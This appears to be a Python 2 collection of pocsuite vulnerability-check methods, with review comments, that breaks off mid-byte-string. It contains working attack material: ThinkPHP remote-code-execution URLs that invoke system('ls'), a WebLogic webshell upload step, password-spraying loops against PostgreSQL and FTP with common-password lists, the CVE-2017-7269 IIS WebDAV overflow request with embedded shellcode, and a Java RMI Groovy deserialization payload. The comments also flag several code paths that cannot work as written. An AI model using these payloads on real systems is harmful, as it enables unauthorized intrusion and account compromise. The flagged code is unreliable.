    def _verify(self):
        """Check whether the target's CouchDB ``/_config/`` path answers
        without authentication.

        Builds ``http://<host>:<port>/_config/`` from ``self.url`` (port
        5984 when the URL carries none), issues a GET and records a finding
        when the status code is 200.  Any exception is printed and treated
        as "not vulnerable".

        Returns:
            Whatever ``self.save_output`` returns for the ``result`` dict.
        """
        import re
        from pocsuite.lib.utils.funs import url2ip

        result = {}
        target = '%s' % self.url

        # url2ip is presumed to return a (host, port) pair when the URL
        # carries a port and a bare host otherwise — confirm against
        # pocsuite.lib.utils.funs.
        if re.findall(r':(\d+)\s*', target):
            host, port = url2ip(target)[0], url2ip(target)[1]
        else:
            host, port = url2ip(target), '5984'

        url = 'http://%s:%s/_config/' % (host, port)
        try:
            # verify=False only matters for https; the probe is plain http.
            status = req.get(url,
                             timeout=5,
                             allow_redirects=True,
                             verify=False).status_code
            # NOTE(review): a bare 200 is a weak signal — any service that
            # serves this path would be reported; consider checking the
            # body or Server header as well.
            if status == 200:
                result['VerifyInfo'] = {'URL': self.url, 'Payload': url}
        except Exception as e:
            print(e)
        print('[+]26 poc done')
        return self.save_output(result)
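    def _verify(self):
        """Check the target SSH service for a user-enumeration weakness.

        Resolves host/port from ``self.url`` (default 22), bails out if the
        port does not accept a TCP connection within one second, then asks
        the module-level ``checkUsername`` helper about a non-existent user
        name; a ``"1"`` reply is recorded as a finding.

        Returns:
            Whatever ``self.save_output`` returns for the ``result`` dict.
        """
        import re
        import socket
        from pocsuite.lib.utils.funs import url2ip

        result = {}
        vul_url = '%s' % self.url

        # url2ip is presumed to return a (host, port) pair when the URL
        # carries a port and a bare host otherwise — confirm against
        # pocsuite.lib.utils.funs.
        if re.findall(r':(\d+)\s*', vul_url):
            _host = url2ip(vul_url)[0]
            # socket.connect needs an int port.  If url2ip hands back a
            # string (the int() casts in sibling PoCs suggest it does), the
            # original raised TypeError here, which was swallowed below and
            # reported as "port closed".
            _port = int(url2ip(vul_url)[1])
        else:
            _host = url2ip(vul_url)
            _port = 22

        # Reachability probe; the socket is closed on every path.
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host, _port))
        except Exception:
            return self.save_output(result)
        finally:
            sk.close()

        # checkUsername's contract is not visible here; only a "1" reply
        # is treated as positive.
        resulta = checkUsername("rootasdf23", _host)
        if resulta == "1":
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = _host
            # str.decode is Python 2 only; this file is Python 2.
            result['VerifyInfo']['Payload'] = "存在ssh 用户枚举".decode("utf8")

        return self.save_output(result)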
    def _verify(self):
        # Probes a WebLogic ws_utc test page and hands off to the module-level
        # upload_webshell helper; a non-empty helper reply is recorded as a
        # finding.  Returns whatever self.save_output returns.
        result = {}

        # Take the port from the URL if one is set, else the default.
        import re
        vul_url = "%s" % self.url
        # from pocsuite.lib.utils.funs import url2ip
        # NOTE(review): url2ip is not imported here, so it must come from the
        # enclosing module.  It presumably returns (host, port) when the URL
        # carries a port and a bare host otherwise — confirm.
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = "7001"
        vul_ip = "http://%s:%s/ws_utc/config.do" % (_host, _port)
        try:
            response = req.get(url=vul_ip, timeout=5,
                               allow_redirects=False)  # do not follow redirects
            if (response.status_code == 200 and "WSDL" in response.text):

                url = "/ws_utc/resources/setting/keystore"
                target = "http://%s:%s/" % (_host, _port)
                # upload_webshell's contract is not visible here; only a
                # non-empty return value is used.
                response = upload_webshell(target, url)
                if (response != ""):

                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_ip
                    result['VerifyInfo']['Payload'] = response
                    return self.save_output(result)
        except Exception as e:
            # Any failure is printed and reported as not vulnerable.
            print e
            pass
        return self.save_output(result)
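    def _verify(self):
        """Run the module-level ``ssltest`` helper against the target's TLS
        port and record a finding when it reports ``"check"``.

        Host and port come from ``self.url`` (default port 443).  Errors
        raised by the helper are printed and treated as "not vulnerable".

        Returns:
            Whatever ``self.save_output`` returns for the ``result`` dict.
        """
        import re
        from pocsuite.lib.utils.funs import url2ip

        result = {}
        vul_url = '%s' % self.url

        # url2ip is presumed to return (host, port) when the URL carries a
        # port and a bare host otherwise — confirm against pocsuite.
        if re.findall(r':(\d+)\s*', vul_url):
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = 443

        try:
            # ssltest's contract is not visible here; only "check" counts.
            ret = ssltest(_host, _port)
            if ret == "check":
                # The original referenced the undefined names `host` and
                # `payload` here, so a NameError was swallowed by the bare
                # except and nothing was ever reported.  Record the probed
                # endpoint instead (constructed value, no helper output).
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = _host
                result['VerifyInfo']['Payload'] = '%s:%s' % (_host, _port)
        except Exception as e:
            # Narrowed from a bare except so Ctrl-C is not swallowed; the
            # error is printed rather than silently dropped.
            print(e)
        print('[+]20 poc done')
        return self.save_output(result)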
    def _verify(self):
        # Probes a ThinkPHP front controller with a fixed list of request
        # strings (`payloads2`, taken verbatim from the listing) and records
        # the first one whose response looks like a directory listing
        # ("index.php" and "robots.txt" both present) or a PHP configuration
        # page ("Configuration File").  Returns whatever self.save_output
        # returns.
        #
        # NOTE(review): the first list, `payloads`, is built but never used —
        # only `payloads2` is iterated.  `time` is imported but unused and
        # `socket` is imported twice.  When connect() fails the probe socket
        # is never closed.
        result={}

        # Take the port from the URL if one is set, else the default.
        import re
        import socket
        import time
        vul_url = "%s"%self.url
        # from pocsuite.lib.utils.funs import url2ip
        # url2ip presumably returns (host, port) when the URL carries a port
        # and a bare host otherwise — confirm against pocsuite.
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = int(url2ip(vul_url)[1])
        else :
            _host = url2ip(vul_url)
            _port = 80
        

        # Check whether the port accepts a TCP connection before probing.
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host,_port))
            #print 'Server port is OK!'
        except Exception:
           return self.save_output(result)
        sk.close()
        
        vul_ip = "http://%s:%s/" % (_host, _port)
        payloads=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
                  "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
                  "index.php?s=index/\\think\Request/input&filter=printf&data=ads3234asdg34ggasda222",
                  "index.php?s=index/\\think\\view\driver\Php/display&content=<?php printf 'ads3234asdg34ggasda222';?>",
                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222"]
        
        payloads2=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
                  "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
                  "index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir",
                  "index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>",
                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir"]
        
        # Each request error is printed and the next entry is tried.
        for p in payloads2:
            url=vul_ip+p
            try:
                text = req.get(url,timeout=4).text
                if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_ip
                    result['VerifyInfo']['Payload'] = p
                    return self.save_output(result)
            except Exception as e:
                print e
                pass
                
        return self.save_output(result)
    def _verify(self):
        import psycopg2
        # Tries a fixed password list against the target's PostgreSQL port and
        # records the first password that logs in.  Returns whatever
        # self.save_output returns.
        #
        # NOTE(review): the default port is the string "5432" but is passed
        # straight to sk.connect(), which expects an int, so on the default
        # port the connect most likely fails with TypeError and is reported
        # as "port not alive".  Sibling PoCs on this page cast with int().
        # `Output(self)` is created but never used; the `user=` value is
        # redacted in this listing ('******', while the message text names
        # postgres); psycopg2 is a third-party dependency; every failed
        # attempt prints the driver exception.
        result = {}
        passwd = [
            '123456', 'admin', 'root', 'password', '123123', '123', '1', '',
            '{user}', '{user}{user}', '{user}1', '{user}123', '{user}2016',
            '{user}2015', '{user}!', 'P@ssw0rd!!', 'qwa123', '12345678',
            'test', '123qwe!@#', '123456789', '123321', '1314520', '666666',
            'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty',
            '1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357',
            'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1',
            'r00t', 'system', '111111', 'admin'
        ]

        import re
        from pocsuite.lib.utils.funs import url2ip
        # url2ip presumably returns (host, port) when the URL carries a port
        # and a bare host otherwise — confirm against pocsuite.
        _port = re.findall(':(\d+)\s*', self.url)
        if len(_port) != 0:
            _host = url2ip(self.url)[0]
            _port = url2ip(self.url)[1]
        else:
            _host = url2ip(self.url)
            _port = "5432"
        print _host, _port

        # Reachability probe; the socket is not closed on the failure path.
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host, _port))
            #print 'Server port is OK!'
        except Exception:
            print 'port not alive'
            return self.save_output(result)
        sk.close()

        output = Output(self)
        message = ''
        for pwd in passwd:
            try:
                # '{user}' placeholders are expanded to the fixed user name.
                pwd = pwd.replace('{user}', 'postgres')
                conn = psycopg2.connect(host=_host,
                                        port=_port,
                                        user='******',
                                        password=pwd)
                message = u' {} 5432端口 Postgresql 存在弱口令: postgres  {}'.format(
                    _host, pwd)
                print "有弱口令漏洞"
                conn.close()
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = self.url
                result['VerifyInfo']['Payload'] = message
                break
            except Exception as e:
                print e
        print '[+]29 poc done'
        return self.save_output(result)
    def _verify(self):
        # Tries the anonymous FTP account with a fixed password list against
        # the target's FTP port and records the first successful login.
        #
        # NOTE(review): there is no comma after "123.com" in the password
        # list, so it and the following '123456' are joined into one entry.
        # The method has no return after the loops: when every attempt fails
        # it returns None instead of self.save_output(result) as the sibling
        # PoCs do.  `flag`, `payload` and `time` are unused;
        # socket.setdefaulttimeout() is process-wide and is re-applied on
        # every iteration; `except Exception, e` is Python 2-only syntax.
        result = {}
        vul_url = '%s' % self.url
        import re
        import time
        import ftplib
        from pocsuite.lib.utils.funs import url2ip
        # url2ip presumably returns (host, port) when the URL carries a port
        # and a bare host otherwise — confirm against pocsuite.
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = int(url2ip(vul_url)[1])
        else:
            _host = url2ip(vul_url)
            _port = 21

        # Check whether the port accepts a TCP connection before trying logins.
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host, _port))
            #print 'Server port is OK!'
        except Exception:
            return self.save_output(result)
        sk.close()

        flag = False
        payload = "弱口令"
        # username = ["www","db","wwwroot","data","web","ftp","anonymous","admin","Admin","Administrator","administrator","root","ADMIN"]
        username = [
            'anonymous',
        ]
        password = [
            "", "toor", "1234", "123456", "admin", "Admin", "ADMIN",
            "admin123", "Admin123", "root", "root123", "123.com"
            '123456', 'admin', 'root', 'password', '123123', '123', '1', '',
            'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#',
            '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou',
            '000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123',
            'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd',
            'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t',
            'system', '111111', 'admin'
        ]
        for u in username:
            for p in password:
                socket.setdefaulttimeout(1)
                ftp = ftplib.FTP()
                try:
                    # Each attempted pair is echoed to stdout.
                    print u, p
                    ftp.connect(_host, _port)
                    ftp.login(u, p)
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = _host
                    result['VerifyInfo']['Payload'] = u + p
                    return self.save_output(result)
                except Exception, e:
                    ftp.close()
                    continue
    def _verify(self):
        # Sends one raw PROPFIND request (the `pay` and `shellcode` bytes
        # below are taken verbatim from the listing and are not reviewed
        # here) to the target port and reports the host when the reply
        # contains a fixed marker string.
        #
        # NOTE(review): the second long literal is split across two physical
        # lines in this listing (a bare line break inside the quotes), so the
        # block does not parse as shown — presumably it was one line in the
        # source file; confirm.
        # NOTE(review): `data` is only assigned inside the try, so a failed
        # recv() leaves it unbound and the later `print data` / `data.find`
        # raise NameError.  connect()/send() sit outside the try, so a
        # refused port propagates and the socket is never closed.  The method
        # returns True/False directly, which makes the final save_output()
        # call unreachable — the result dict is never handed to the framework.
        # ip = self.url.split(':')[1].replace('/', '')
        #from api.utils import url2ip
        #-------------- take the web port after the colon in the URL
        import re
        _port = re.findall(':(\d+)\s*', self.url)
        if len(_port) != 0:
            _port = url2ip(self.url)[1]
        else:
            _port = 80
        #-------------

        # NOTE(review): used directly as the host even when the URL carries a
        # port; sibling PoCs index [0] in that case — confirm url2ip's return.
        ip = url2ip(self.url)

        import socket
        result={}

        pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
        pay += 'If: <http://localhost/aaaaaaa'
        pay += '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
        pay += '>'
        pay += ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
        pay += '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8
\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
        shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTKOXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBNVO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGNX9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPPSKOYEKPA'
        pay += shellcode
        pay += '>\r\n\r\n'


        # No timeout is set on this socket, so a silent host can block.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((ip, _port))# ip port
        sock.send(pay)

        try:
            data = sock.recv(80960)
        except:
            print '连接失败'
            pass

        print '-'*18+'\n'
        print data
        print '-'*18+'\n'

        sock.close()

        if not -1 == data.find('HHIT CVE-2017-7269 Success'):
            message = '%s is vulnerable!' %ip + 'CVE-2017-7269 vulnerability!'
            print(message)
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = ip
            result['VerifyInfo']['Payload'] = pay
            return True

        else:
            print '没有发现关键字.'
            return False

        return self.save_output(result)
    def _verify(self):
        import socket
        # Sends one raw TCP payload (header, length byte, command string,
        # trailer — the byte strings below are taken verbatim from the
        # listing and are not reviewed here) to the target port, reads up to
        # 512 bytes back and closes the socket.
        #
        # NOTE(review): the long literals are split across physical lines in
        # this listing — a backslash-newline inside the quotes (which would
        # silently drop the "\" of the following escape) and bare line breaks
        # (which do not parse).  Presumably each literal was one line in the
        # source file; confirm before relying on the bytes.
        # NOTE(review): the method never returns anything: `data` is read but
        # not examined, the result block is commented out, and the except arm
        # only resets `result`, so the framework never receives a verdict.
        # str.encode('hex') and the integer `/` in the length computation are
        # Python 2 semantics.
        # Result dict.
        result = {}
        # Target URL.
        vul_url = '%s' % self.url

        # Take the port from the URL if one is set, else the default.
        import re
        from pocsuite.lib.utils.funs import url2ip
        # url2ip presumably returns (host, port) when the URL carries a port
        # and a bare host otherwise — confirm against pocsuite.
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = "10001"

        # Leading part of the raw payload.
        payload_one = '\x4a\x52\x4d\x49\x00\x02\x4b\x00\x0d\x31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e\x31\x30\x34\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x12\x70\x77\x6e\x65\x64\x39\x37\x34\x31\x30\x30\x36\x31\x34\x30\x31\x32\x33\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x72\x00\x2c\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x74\x65\x64\x43\x6c\x6f\x73\x75\x72\x65\x10\x23\x37\x19\
xf7\x15\xdd\x1b\x02\x00\x01\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x70\x78\x72\x00\x2d\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x73\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x10\x23\x37\x1a\xd6\x01\xbc\x1b\x02\x00\x02\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x68\x61\x6e\x64\x6c\x65\x43\x61\x63\x68\x65\x74\x00\x28\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x3b\x70\x78\x70\x73\x72\x00\x29\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x4d\x65\x74\x68\x6f\x64\x43\x6c\x6f\x73\x75\x72\x65\x11\x0e\x3e\x84\x8f\xbd\xce\x48\x02\x00\x01\x4c\x00\x06\x6d\x65\x74\x68\x6f\x64\x71\x00\x7e\x00\x0f\x70\x78\x72\x00\x13\x67\x72\x6f\x6f\x76\x79\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x6f\x73\x75\x72\x65\x3c\xa0\xc7\x66\x16\x12\x6c\x5a\x02\x00\x08\x49\x00\x09\x64\x69\x72\x65\x63\x74\x69\x76\x65\x49\x00\x19\x6d\x61\x78\x69\x6d\x75\x6d\x4e\x75\x6d\x62\x65\x72\x4f\x66\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x73\x49\x00\x0f\x72\x65\x73\x6f\x6c\x76\x65\x53\x74\x72\x61\x74\x65\x67\x79\x4c\x00\x